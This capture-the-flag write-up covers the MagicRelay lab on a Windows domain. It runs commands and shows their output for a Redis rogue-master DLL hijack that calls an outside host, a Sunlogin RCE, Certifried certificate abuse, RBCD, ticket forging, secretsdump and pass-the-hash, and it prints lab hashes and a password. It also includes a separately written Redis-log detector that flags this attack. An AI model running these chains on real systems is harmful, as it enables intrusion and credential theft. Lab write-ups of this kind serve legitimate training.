春秋云镜-MagicRelay

This article was last updated on 2025.03.14

flag01

Start by running fscan against the target:

```
fscan -h 39.98.127.172

fscan version: 1.8.3
start infoscan
39.98.127.172:135 open
39.98.127.172:139 open
39.98.127.172:6379 open
[*] alive ports len is: 3
start vulscan
[*] NetInfo
[*]39.98.127.172
[->]WIN-YUYAOX9Q
[->]172.22.12.25
[+] Redis 39.98.127.172:6379 unauthorized file:C:\Program Files\Redis/dump.rdb
```

There is an unauthenticated Redis service, but the target is a Windows box, so the usual Redis exploitation conditions are hard to meet. See the write-up 踩坑记录-Redis(Windows)的getshell (notes on the pitfalls of getting a shell through Redis on Windows).

It uses r35tart/RedisWriteFile (a tool that writes a file without corruption through Redis master-slave replication).

The question now is what file to write. There is no web service, the OS version rules out the MOF technique, and startup items are not realistic, so DLL hijacking is the only option left.

Reference: 文章 - Windows Redis DLL劫持在实战中的利用 - 先知社区 (Windows Redis DLL hijacking in practice, Xianzhi community).

First use the P4r4d1se/dll_hijack project to generate a dbgmain.dll.

Open it in Visual Studio, replace the shellcode with your own, then build with the Release x64 configuration to produce the DLL.

```
root@dkhkY7buMr7kYt:~/tools/RedisWriteFile# python3 RedisWriteFile.py --rhost 39.98.127.172 --rport 6379 --lhost 156.238.233.55  --lport 8888 --rpath 'C:\\Program Files\\Redis\\' --rfile 'dbghelp.dll' --lfile 'dbghelp.dll'

Author : R3start
Reference : redis-rogue-server.py

[info] TARGET 39.98.127.172:6379
[info] SERVER 156.238.233.55:8888
[info] 连接恶意主服务器: 156.238.233.55:8888
[info] 连接恶意主状态: +OK

[info] 设置写出路径为: C:\\Program Files\\Redis\\
[info] 设置写出路径状态: +OK

[info] 设置写出文件为: dbghelp.dll
[info] 设置写出文件状态: +OK

[info] 断开主从连接: +OK

[info] 恢复原始文件名: +OK

root@dkhkY7buMr7kYt:~/tools/RedisWriteFile# redis-cli -h 39.98.127.172
39.98.127.172:6379> bgsave
Background saving started
```

The session checks in to VSHELL successfully; CS or msf would work just as well here, whichever you are used to.

flag01: flag{58455a83-7516-4a8f-92bf-ca94e7aa33a0}
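A defender-side counterpart to the Redis write primitive used above. This is an added example, not code from the post or from RedisWriteFile: it parses Redis MONITOR output and flags the SLAVEOF/REPLICAOF plus CONFIG SET dir/dbfilename chain from one client, as well as any dbfilename that is not an .rdb. The sample MONITOR lines are constructed; the timestamps and client ports are made up, and the MONITOR line layout is assumed from Redis's documented format.

```python
import re
from collections import defaultdict

# Constructed sample of Redis MONITOR output ("<ts> [<db> <ip:port>] "CMD" "arg"..."); values are made up.
SAMPLE_MONITOR_LINES = [
    r'1741490560.101 [0 172.22.12.12:51002] "GET" "session:42"',
    r'1741490561.204 [0 156.238.233.55:40122] "SLAVEOF" "156.238.233.55" "8888"',
    r'1741490561.305 [0 156.238.233.55:40122] "CONFIG" "SET" "dir" "C:\\Program Files\\Redis\\"',
    r'1741490561.406 [0 156.238.233.55:40122] "CONFIG" "SET" "dbfilename" "dbghelp.dll"',
    r'1741490563.512 [0 156.238.233.55:40122] "SLAVEOF" "NO" "ONE"',
    r'1741490563.613 [0 156.238.233.55:40122] "CONFIG" "SET" "dbfilename" "dump.rdb"',
]

LINE_RE = re.compile(r'^(?P<ts>\d+\.\d+) \[(?P<db>\d+) (?P<client>[^\]]+)\] (?P<args>.*)$')
ARG_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')  # one quoted argument, allowing \" and \\ escapes

def parse_monitor_line(line):
    """Return (timestamp, client, [args]) for one MONITOR line, or None if it does not parse."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    args = [a.replace('\\"', '"').replace('\\\\', '\\') for a in ARG_RE.findall(m["args"])]
    return float(m["ts"]), m["client"], args

def detect_rogue_master_writes(lines, window=30.0):
    """Per client: flag a non-.rdb dbfilename, and the REPLICAOF -> CONFIG SET dir -> dbfilename chain within `window` seconds."""
    seen = defaultdict(dict)  # client -> {"master"|"dir"|"dbfilename": (ts, value)}
    findings = []
    for line in lines:
        parsed = parse_monitor_line(line)
        if not parsed or not parsed[2]:
            continue
        ts, client, args = parsed
        cmd, st = args[0].upper(), seen[client]
        if cmd in ("SLAVEOF", "REPLICAOF") and len(args) == 3:
            if (args[1].upper(), args[2].upper()) == ("NO", "ONE"):
                continue  # detaching from a master is not suspicious on its own
            st["master"] = (ts, f"{args[1]}:{args[2]}")
        elif cmd == "CONFIG" and len(args) == 4 and args[1].upper() == "SET":
            key, value = args[2].lower(), args[3]
            if key in ("dir", "dbfilename"):
                st[key] = (ts, value)
            if key == "dbfilename" and not value.lower().endswith(".rdb"):
                findings.append({"client": client, "kind": "non_rdb_dbfilename", "detail": f"dump file renamed to {value!r}"})
        if all(k in st for k in ("master", "dir", "dbfilename")) and ts - st["master"][0] <= window:
            findings.append({"client": client, "kind": "rogue_master_write",
                             "detail": f"REPLICAOF {st['master'][1]} then CONFIG SET dir={st['dir'][1]!r} dbfilename={st['dbfilename'][1]!r}"})
            st.clear()  # report the chain once per connection
    return findings
```

Feed it `redis-cli MONITOR` output (or a log of it) and alert on any `rogue_master_write` finding; requiring a password and renaming or disabling CONFIG and SLAVEOF in redis.conf removes the primitive altogether.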

flag02

Scan the internal network:

```
fscan -h 172.22.12.25/24

fscan version: 1.8.3
start infoscan
(icmp) Target 172.22.12.6 is alive
(icmp) Target 172.22.12.12 is alive
(icmp) Target 172.22.12.25 is alive
(icmp) Target 172.22.12.31 is alive
[*] Icmp alive hosts len is: 4
172.22.12.6:88 open
172.22.12.25:6379 open
172.22.12.31:445 open
172.22.12.25:445 open
172.22.12.12:445 open
172.22.12.6:445 open
172.22.12.31:139 open
172.22.12.12:80 open
172.22.12.12:139 open
172.22.12.12:135 open
172.22.12.6:139 open
172.22.12.25:139 open
172.22.12.31:135 open
172.22.12.6:135 open
172.22.12.25:135 open
172.22.12.31:80 open
172.22.12.31:21 open
[*] alive ports len is: 17
start vulscan
[*] NetInfo
[*]172.22.12.25
[->]WIN-YUYAOX9Q
[->]172.22.12.25
[*] NetInfo
[*]172.22.12.31
[->]WIN-IISQE3PC
[->]172.22.12.31
[*] NetInfo
[*]172.22.12.12
[->]WIN-AUTHORITY
[->]172.22.12.12
[*] NetInfo
[*]172.22.12.6
[->]WIN-SERVER
[->]172.22.12.6
[*] NetBios 172.22.12.6 [+] DC:WIN-SERVER.xiaorang.lab Windows Server 2016 Standard 14393
[*] NetBios 172.22.12.12 WIN-AUTHORITY.xiaorang.lab Windows Server 2016 Datacenter 14393
[*] NetBios 172.22.12.31 WORKGROUP\WIN-IISQE3PC
[*] OsInfo 172.22.12.6 (Windows Server 2016 Standard 14393)
[+] ftp 172.22.12.31:21:anonymous
[->]SunloginClient_11.0.0.33826_x64.exe
[*] WebTitle http://172.22.12.12 code:200 len:703 title:IIS Windows Server
[*] WebTitle http://172.22.12.31 code:200 len:703 title:IIS Windows Server
[+] PocScan http://172.22.12.12 poc-yaml-active-directory-certsrv-detect
[+] Redis 172.22.12.25:6379 unauthorized file:C:\Program Files\Redis/dump.rdb
```

Hosts found on the internal network:

172.22.12.6 DC: WIN-SERVER.xiaorang.lab

172.22.12.12 WIN-AUTHORITY.xiaorang.lab

172.22.12.25 the externally reachable entry host

172.22.12.31 WORKGROUP\WIN-IISQE3PC

Host .31 allows anonymous FTP access, and it holds an old Sunlogin (向日葵) installer. A quick search turns up a matching RCE: Mr-xn/sunlogin_rce (向日葵 RCE).

First scan for the exact port:

```
xrkRce.exe -h 172.22.12.31  -t scan
```

Then read the flag directly:

```
xrkRce -h 172.22.12.31  -t rce -p 49686 -c "whoami"
xrkRce -h 172.22.12.31 -t rce -p 49686 -c "type "C:\Users\Administrator\flag\flag02.txt""
```

flag02: flag{29a46b72-8a82-182a-45f3-532475ec6fd4}

flag04

The account has SeImpersonatePrivilege, so Rotten Potato (烂土豆) can be used to escalate to SYSTEM before collecting domain information.

As the local administrator, the domain is not reachable. After escalating to SYSTEM with Rotten Potato and bringing that session up in VSHELL, it is.

BloodHound did not reveal anything useful, though. Going back to the earlier fscan result:

PocScan http://172.22.12.12 poc-yaml-active-directory-certsrv-detect. See the explanation of CVE-2022-26923 (Certifried).

fscan found that the CA server is affected by an Active Directory privilege escalation vulnerability: by abusing Active Directory Certificate Services (AD CS) to request a machine certificate with an arbitrary, attacker-controlled DNS hostname, any machine account in the domain can impersonate the domain controller, which leads to full domain takeover.

First get the CA name, then dump a hash:

```
* Username : WIN-YUYAOX9Q$
* Domain : XIAORANG
* NTLM : e611213c6a712f9b18a8d056005a4f0f
* SHA1 : 1a8d2c95320592037c0fa583c1f62212d4ff8ce9
```

Configure the hosts file:

```
172.22.12.6 WIN-SERVER.xiaorang.lab
172.22.12.12 xiaorang-WIN-AUTHORITY-CA
172.22.12.6 xiaorang.lab
172.22.12.12 WIN-AUTHORITY.xiaorang.lab
```

Use this hash to register a machine account that will act as the domain admin:

```
proxychains -q certipy-ad account create -u WIN-YUYAOX9Q$ -hashes e611213c6a712f9b18a8d056005a4f0f  -dc-ip 172.22.12.6 -user citrus -dns WIN-SERVER.xiaorang.lab -debug
```

This gives citrus$ with the password DMlUxkWbuyfEQ3Rq.

```
proxychains -q certipy-ad find -u 'citrus$@xiaorang.lab' -password 'DMlUxkWbuyfEQ3Rq' -dc-ip 172.22.12.6 -vulnerable -stdout
```

Then request a Machine certificate (this may time out; it had to be run twice):

```
proxychains -q certipy-ad req -u 'citrus$@xiaorang.lab' -p 'DMlUxkWbuyfEQ3Rq' -ca 'xiaorang-WIN-AUTHORITY-CA' -target 172.22.12.12 -dc-ip 172.22.12.6 -template 'Machine' -debug 
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[+] Generating RSA key
[*] Requesting certificate via RPC
[+] Trying to connect to endpoint: ncacn_np:172.22.12.12[\pipe\cert]
[+] Connected to endpoint: ncacn_np:172.22.12.12[\pipe\cert]
[*] Successfully requested certificate
[*] Request ID is 4
[*] Got certificate with DNS Host Name 'WIN-SERVER.xiaorang.lab'
[*] Certificate object SID is 'S-1-5-21-3745972894-1678056601-2622918667-1106'
[*] Saved certificate and private key to 'win-server.pfx'
```

Then try to get the domain admin hash:

```
proxychains -q certipy-ad auth -pfx win-server.pfx -dc-ip 172.22.12.6
```

This errors out, because the certificate obtained has no EKU, so certipy auth cannot use it for Kerberos. The workaround is Pass the Certificate (see Pass the Certificate | The Hacker Recipes). Split the PFX into certificate and key:

```
certipy-ad cert -pfx win-server.pfx -nokey -out win-server.crt 
certipy-ad cert -pfx win-server.pfx -nocert -out win-server.key
```

Use passthecert.py with the certificate to configure RBCD on the domain controller:

```
proxychains -q python3 passthecert.py -action write_rbcd -crt win-server.crt -key win-server.key -domain xiaorang.lab -dc-ip 172.22.12.6 -delegate-to 'win-server$' -delegate-from 'citrus$'

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] citrus$ can now impersonate users on win-server$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] citrus$ (S-1-5-21-3745972894-1678056601-2622918667-1106)
```

Request a service ticket (ST) for the cifs service:

```
proxychains -q impacket-getST xiaorang.lab/'citrus$':'DMlUxkWbuyfEQ3Rq' -spn cifs/win-server.xiaorang.lab -impersonate Administrator -dc-ip 172.22.12.6
```

Import the ticket:

```
export KRB5CCNAME=Administrator@cifs_win-server.xiaorang.lab@XIAORANG.LAB.ccache
```

Pass the ticket (PTT):

```
proxychains -q python3 psexec.py xiaorang.lab/administrator@win-server.xiaorang.lab -k -no-pass -target-ip 172.22.12.6 -codec gbk
```

flag04: flag{4c7d6e81-3161-4853-b93f-349ab74a60e5}

flag03

Dump the hashes using the ticket (PTT):

```
proxychains -q python3 secretsdump.py 'xiaorang.lab/administrator@win-server.xiaorang.lab' -target-ip 172.22.12.6 -no-pass -k
```

There are two administrator entries; check which one is the right one:

```
┌──(root㉿kali)-[~/Desktop/tools/impacket/examples]
└─# proxychains -q crackmapexec smb 172.22.12.12 -u 'administrator' -H 'd418e6aaeff1177bee5f84cf0466802c'
SMB 172.22.12.12 445 WIN-AUTHORITY [*] Windows Server 2016 Datacenter 14393 x64 (name:WIN-AUTHORITY) (domain:xiaorang.lab) (signing:False) (SMBv1:True)
SMB 172.22.12.12 445 WIN-AUTHORITY [-] xiaorang.lab\administrator:d418e6aaeff1177bee5f84cf0466802c STATUS_LOGON_FAILURE

┌──(root㉿kali)-[~/Desktop/tools/impacket/examples]
└─# proxychains -q crackmapexec smb 172.22.12.12 -u 'administrator' -H 'aa95e708a5182931157a526acf769b13'
SMB 172.22.12.12 445 WIN-AUTHORITY [*] Windows Server 2016 Datacenter 14393 x64 (name:WIN-AUTHORITY) (domain:xiaorang.lab) (signing:False) (SMBv1:True)
SMB 172.22.12.12 445 WIN-AUTHORITY [+] xiaorang.lab\administrator:aa95e708a5182931157a526acf769b13 (Pwn3d!)
```

Pass the hash (PTH) to get the last flag:

```
proxychains -q python3 wmiexec.py -hashes :aa95e708a5182931157a526acf769b13 xiaorang.lab/administrator@172.22.12.12 -codec gbk
```

flag03: flag{317621a6-bb66-4154-b157-365c871d52d2}

References

MagicRelay - C1trus

内网渗透—春秋云镜篇之2022网鼎杯 (腾讯云开发者社区)

Windows Redis DLL劫持在实战中的利用 (先知社区)